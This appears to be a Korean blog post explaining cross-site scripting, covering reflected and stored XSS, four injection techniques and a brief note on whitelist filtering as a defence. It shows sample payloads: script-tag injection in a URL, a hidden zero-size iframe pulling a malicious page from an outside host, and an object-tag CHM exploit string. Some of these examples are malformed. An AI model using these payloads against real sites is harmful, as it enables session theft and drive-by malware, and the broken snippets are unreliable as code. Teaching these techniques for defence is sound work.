XSS(크로스 사이트 스크립트)?

1. XSS란?
Cross Site Scripting(XSS)의 약자이며, 특정페이지에 스크립트를 넣어서 세션을 가로채거나 공격자가 의도한대로 행동하도록 만드는 웹 공격의 일종이다. XSS는 크게 Reflected XSS와 Stored XSS로 분류할 수가 있다.

Reflected XSS는 공격 스크립트가 삽입된 URL을 사용자가 쉽게 확인할 수 없도록 변형시킨 후 이메일이나 다른 웹사이트 등에 클릭을 유도하도록 하는 방법이다.

Stored XSS는 스크립트를 일반 게시판 등에 공격자가 게시글에 스크립트를 삽입하여 사용자가 해당 페이지를 클릭하는 순간 스크립트가 실행하도록 하는 방법이다.

2. XSS를 이용한 공격 유형 4가지
ㄱ. <script> 태그 삽입
   URL 파라미터 값에 스크립트를 넣는 방식으로 <script>와 </script> 넣는 내용에 따라 다양한 기법을 구사할 수 있다.
ex) <a href="<script>악성코드</script>" target="_blank"><script>악성코드</script>">http://sample.com/comment.cgi?comment=<script>악성코드</script>"> Click here </A>

ㄴ. <iframe> 태그 삽입
   iframe 태그를 이용하여 악성 코드가 포함된 사이트로 세션을 연결해 자동으로 프로그램을 다운로드 시킨다.
ex) <iframe src=http://sample.com/~bbs/hack.htm name="Click here" width=0 heigth=0frameborder=0></iframe>

ㄷ. <Object> 태그 삽입
   object 태그와 ITS 프로토콜 핸들러에 의한 chm처리시의 취약점을 이용한다.
ex) object width=0 height=0 style=display:none; type=text/xscriptlet"
Data=mk:@MSITStore:mhtml:c:\nosuchfile.mht!</script>">http://sample.com/exploit_chm::exploit.html></script>
--> 사용자 PC에 c:\nosuchfile.mht 파일이 존재하지 않는 경우(시스템에 존재하지 않는 파일 이름을 적기)http://sample.com/exploit_chm::exploit.html에 접속하여 로컬 시스템 파일처럼 exploit.html을 실행한다. 당연히 이 exploit.html은 악성코드가 된다.

ㄹ.String.fromCharCode()함수 삽입
   String.fromCharCode()함수를 사용하여 URL 정보를 인코딩 하는 기법이며, 일반 문자열을 10진수로 표기하여 관리자의 가독성을 떨어뜨린다.
ex) <script> alert(String.fromCharCode(116,101,115,116))</script>--> 116=t, 101=e, 115=s, 116=t

3. XSS공격 대응방법

가장 중요한 것은 스크립트 코드에 사용되는 특수문자에 대해 이해하고 필터링을 해야한다.
효과적인 방법은 사용자가 입력 가능한 문자만을 지정해 놓고, 그 문자열이 아니면 필터링을 한다.

실제로 구현한 코드이다.- replace(문자열, 찾을 문자열, 바꿀 문자열)

[선수 과목] 자바스크립트, PHP 등의 웹프로그래밍언어

http://tiger5net.egloos.com/viewer/5055050!!! 

[출처] XSS(크로스 사이트 스크립팅)|작성자 Zealous